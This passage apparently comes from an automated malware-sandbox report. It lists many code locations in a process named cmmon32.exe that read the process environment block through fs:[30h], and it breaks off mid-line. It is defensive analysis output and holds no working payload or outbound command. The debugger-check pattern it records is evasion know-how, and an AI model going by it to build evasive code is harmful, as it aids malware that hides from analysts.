          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]5_2_04D77016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC4015 mov eax, dword ptr fs:[00000030h]5_2_04DC4015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC4015 mov eax, dword ptr fs:[00000030h]5_2_04DC4015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]5_2_04D0B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]5_2_04D0B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]5_2_04D0B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]5_2_04D0B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]5_2_04D2002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]5_2_04D2002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]5_2_04D2002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]5_2_04D2002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]5_2_04D2002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CFB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CFB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]5_2_04CFB1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D841E8 mov eax, dword ptr fs:[00000030h]5_2_04D841E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D22990 mov eax, dword ptr fs:[00000030h]5_2_04D22990
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1C182 mov eax, dword ptr fs:[00000030h]5_2_04D1C182
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A185 mov eax, dword ptr fs:[00000030h]5_2_04D2A185
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]5_2_04D751BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]5_2_04D751BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]5_2_04D751BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]5_2_04D751BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D769A6 mov eax, dword p